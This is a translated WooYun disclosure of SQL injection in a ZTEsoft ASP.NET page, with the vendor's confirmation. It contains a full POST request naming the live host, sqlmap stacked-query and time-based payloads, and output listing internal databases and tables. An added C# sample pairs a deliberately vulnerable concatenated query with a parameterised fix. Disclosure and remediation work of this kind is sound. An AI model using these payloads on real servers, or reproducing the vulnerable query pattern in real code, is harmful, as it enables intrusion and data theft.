
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0102709

Title: SQL injection vulnerability in a ZTE interface

Vendor: ZTE Corporation (中兴通讯股份有限公司)

Author: 路人甲

Submitted: 2015-03-23 10:40

Fixed: 2015-05-07 13:58

Published: 2015-05-07 13:58

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 12

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-03-23: Details sent to the vendor, awaiting vendor handling
2015-03-23: Vendor confirmed; details disclosed to the vendor only
2015-04-02: Details disclosed to core white hats and experts in the relevant field
2015-04-12: Details disclosed to regular white hats
2015-04-22: Details disclosed to intern white hats
2015-05-07: Details disclosed to the public

Brief description:

Detailed description:

http://www.ztesoft.com:18085/sq/emailcheck.aspx

An interface of ZTEsoft (中兴软创) has SQL injection:

POST /sq/emailcheck.aspx HTTP/1.1
Content-Length: 369
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.ztesoft.com:18085/
Cookie: ASP.NET_SessionId=sjtfsve1a3lq5a555vnfok45
Host: www.ztesoft.com:18085
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Button1=Submit&TextBox1=1&__VIEWSTATE=dDwxNjY3MDE2MTI4O3Q8O2w8aTwxPjs%2bO2w8dDw7bDxpPDE3Pjs%2bO2w8dDxwPHA8bDxOYXZpZ2F0ZVVybDs%2bO2w8bWFpbHRvOnh1LmR1b0B6dGUuY29tLmNuP3N1YmplY3Q9SSB3YW50IHRvIGpvaW4gdGhlIHNhdGlzZmFjdGlvbiBxdWVzdGlvbm5haXJlOz4%2bOz47Oz47Pj47Pj47Pndu%2bHogmyqqjAlTGkBPicUQLlMs&__VIEWSTATEGENERATOR=4607DA12

The injectable parameter is TextBox1.

[screenshot: 1.jpg]


14 databases:

sqlmap identified the following injection points with a total of 728 HTTP(s) requests:
---
Place: POST
Parameter: TextBox1
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: Button1=Submit&TextBox1=1'; IF(9302=9302) SELECT 9302 ELSE DROP FUNCTION aNqw--&__VIEWSTATE=dDwxNjY3MDE2MTI4O3Q8O2w8aTwxPjs+O2w8dDw7bDxpPDExPjtpPDE3Pjs+O2w8dDxwPHA8bDxUZXh0Oz47bDxTb3JyeSx0aGUgZW1haWwgZG9lc24ndCBleGlzdCE7Pj47Pjs7Pjt0PHA8cDxsPFRleHQ7TmF2aWdhdGVVcmw7PjtsPGhlcmUuO21haWx0bzp4dS5kdW9AenRlLmNvbS5jbj9zdWJqZWN0PUkgd2FudCB0byBqb2luIHRoZSBzYXRpc2ZhY3Rpb24gcXVlc3Rpb25uYWlyZTs+Pjs+Ozs+Oz4+Oz4+Oz4Ew/IvDbOOr+zt90lfyLuwIUVjug==&__VIEWSTATEGENERATOR=4607DA12
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: Button1=Submit&TextBox1=1'; WAITFOR DELAY '0:0:5'--&__VIEWSTATE=dDwxNjY3MDE2MTI4O3Q8O2w8aTwxPjs+O2w8dDw7bDxpPDExPjtpPDE3Pjs+O2w8dDxwPHA8bDxUZXh0Oz47bDxTb3JyeSx0aGUgZW1haWwgZG9lc24ndCBleGlzdCE7Pj47Pjs7Pjt0PHA8cDxsPFRleHQ7TmF2aWdhdGVVcmw7PjtsPGhlcmUuO21haWx0bzp4dS5kdW9AenRlLmNvbS5jbj9zdWJqZWN0PUkgd2FudCB0byBqb2luIHRoZSBzYXRpc2ZhY3Rpb24gcXVlc3Rpb25uYWlyZTs+Pjs+Ozs+Oz4+Oz4+Oz4Ew/IvDbOOr+zt90lfyLuwIUVjug==&__VIEWSTATEGENERATOR=4607DA12
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: Button1=Submit&TextBox1=1' WAITFOR DELAY '0:0:5'--&__VIEWSTATE=dDwxNjY3MDE2MTI4O3Q8O2w8aTwxPjs+O2w8dDw7bDxpPDExPjtpPDE3Pjs+O2w8dDxwPHA8bDxUZXh0Oz47bDxTb3JyeSx0aGUgZW1haWwgZG9lc24ndCBleGlzdCE7Pj47Pjs7Pjt0PHA8cDxsPFRleHQ7TmF2aWdhdGVVcmw7PjtsPGhlcmUuO21haWx0bzp4dS5kdW9AenRlLmNvbS5jbj9zdWJqZWN0PUkgd2FudCB0byBqb2luIHRoZSBzYXRpc2ZhY3Rpb24gcXVlc3Rpb25uYWlyZTs+Pjs+Ozs+Oz4+Oz4+Oz4Ew/IvDbOOr+zt90lfyLuwIUVjug==&__VIEWSTATEGENERATOR=4607DA12
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2005
available databases [14]:
[*] cot_bsn
[*] FAQDB
[*] lumigent
[*] LumigentDemoDB
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] TekRADIUS
[*] tempdb
[*] urtracker
[*] urtracker_bsn
[*] urtracker_ccb


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Database: cot_bsn
[101 tables]
+-----------------------------------+
| Accounts_AccessListItems |
| Accounts_AccessLists |
| Accounts_Department |
| Accounts_PermissionCategories |
| Accounts_Permissions |
| Accounts_RolePermissions |
| Accounts_Roles |
| Accounts_UserRoles |
| Accounts_UserState |
| Accounts_Users |
| Common_Config |
| Kb_ArticleAttachments |
| Kb_ArticleComment |
| Kb_Articles |
| Kb_Categories |
| PROBLEMCatalogGroup |
| Pts_DbDirectory |
| Pts_FilterNodes |
| Pts_Filters |
| Pts_GlobalSelectValues |
| Pts_GlobalSelects |
| Pts_ProblemAttachments |
| Pts_ProblemCatalogs |
| Pts_ProblemFields |
| Pts_ProblemHistory |
| Pts_ProblemInitStateWorkgroup |
| Pts_ProblemPriority |
| Pts_ProblemRelations |
| Pts_ProblemSeverity |
| Pts_ProblemShiftHistory |
| Pts_ProblemState |
| Pts_ProblemStateRecord |
| Pts_ProblemStateTimeLimit |
| Pts_ProblemStateTransfer |
| Pts_ProblemStateTransferWorkgroup |
| Pts_ProblemType |
| Pts_ProblemVisitHistory |
| Pts_Problems |
| Pts_ProjectCatalogs |
| Pts_ProjectStates |
| Pts_ProjectTempletDbDirectory |
| Pts_ProjectTemplets |
| Pts_Projects |
| Pts_RecordAttachments |
| Pts_Records |
| Pts_StateEditableFields |
| Pts_Version |
| Pts_WorkgroupUsers |
| Pts_Workgroups |
| TestGroup_Notify |
| Test_Env |
| TransFile_OCSEnv |
| Transfile_Environment |
| Transfile_Environment_Extend |
| Transfile_Environment_Extend_TEMP |
| Transfile_Environment_TEMP |
| Transfile_Environment_Web |
| Transfile_Environment_Web_TEMP |
| Transfile_Environment_bak |
| Transfile_Param |
| Transfile_URInfo |
| Transfile_VersionUpdate_Server |
| Transfile_Version_Num_Map |
| UR_TASK_PLAN |
| UR_TO_Project_Config |
| auto_testcase |
| bsnuser |
| ccb_state_type |
| dtproperties |
| holiday |
| office_contact |
| problem_user |
| pts_RecordType |
| tester |
| v_Accounts_Permissions |
| v_Accounts_Users |
| v_ExceedStat_no1 |
| v_Kb_ArticleList |
| v_Pts_ProblemAttachments |
| v_Pts_ProblemHistory |
| v_Pts_ProblemStateRecord |
| v_Pts_ProblemVisitHistory |
| v_Pts_Problems |
| v_Pts_ProblemsExceedStat |
| v_Pts_ProblemsFinishedExceedStat |
| v_Pts_ProblemsPutOffStat |
| v_Pts_ProblemsWithRecords |
| v_Pts_Projects |
| v_Pts_RecordAttachments |
| v_Pts_Records |
| v_Pts_UserWorkgroups |
| v_Pts_stat_StateKeepTime |
| v_QQ_QUERY |
| version_batch_control |
| version_info |
| version_plan |
| version_plan_log |
| webbuild_log |
| webbuild_server |
| pubuser.bsnuser_bak |
| pubuser.dy_test |
+-----------------------------------+


Not going any deeper~
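The report does not show the server-side code behind emailcheck.aspx, but the sqlmap findings (a quote-terminated string, stacked queries and WAITFOR accepted in TextBox1) match a query built by string concatenation. The following is an added illustration, not ZTEsoft's code: it shows that presumed pattern next to the parameterised form that closes it, written for the ASP.NET 1.1 / SQL Server stack the fingerprint reports. The table name Users, the column Email, the Label1 control and the connection string are assumptions.

```csharp
// Added illustration, not ZTEsoft's code. "Users", "Email", Label1 and the
// connection string are assumed; TextBox1/Button1 are the names in the report.
using System;
using System.Data;
using System.Data.SqlClient;
using System.Web.UI;
using System.Web.UI.WebControls;

public class EmailCheckPage : Page
{
    protected TextBox TextBox1;
    protected Label Label1;
    const string ConnectionString = "<placeholder: read from Web.config>";

    // Presumed vulnerable pattern: the form value is spliced into the SQL text.
    // A value like  1'; WAITFOR DELAY '0:0:5'--  closes the string literal,
    // appends a second statement (SQL Server executes stacked batches) and
    // comments out the trailing quote, which is exactly what sqlmap detected.
    static bool EmailExistsVulnerable(SqlConnection conn, string email)
    {
        string sql = "SELECT COUNT(*) FROM Users WHERE Email = '" + email + "'";
        return (int)new SqlCommand(sql, conn).ExecuteScalar() > 0;
    }

    // Fixed pattern: the value is bound as a typed, length-limited parameter,
    // so quotes, semicolons and WAITFOR are plain characters compared against
    // the column and can never change the statement being executed.
    static bool EmailExists(SqlConnection conn, string email)
    {
        const string sql = "SELECT COUNT(*) FROM Users WHERE Email = @email";
        SqlCommand cmd = new SqlCommand(sql, conn);
        cmd.Parameters.Add("@email", SqlDbType.NVarChar, 255).Value = email;
        return (int)cmd.ExecuteScalar() > 0;
    }

    protected void Button1_Click(object sender, EventArgs e)
    {
        string input = TextBox1.Text.Trim();
        bool found = false;
        // Cheap shape check in front of the query: defence in depth, not the fix.
        if (input.Length <= 255 && input.IndexOf('@') > 0)
        {
            using (SqlConnection conn = new SqlConnection(ConnectionString))
            {
                conn.Open();
                found = EmailExists(conn, input);
            }
        }
        // One message for malformed and unknown addresses alike.
        Label1.Text = found ? "OK" : "The email was not found.";
    }
}
```

The database list in the report (master, msdb, ReportServer and others) shows the application's login could enumerate every database on the instance; parameterisation removes the injection, and a dedicated login scoped to the application's own database limits what any future one can reach.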

Proof of vulnerability:

Fix recommendation:

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2015-03-23 13:56

Vendor reply:

Thanks~

Latest status:

None yet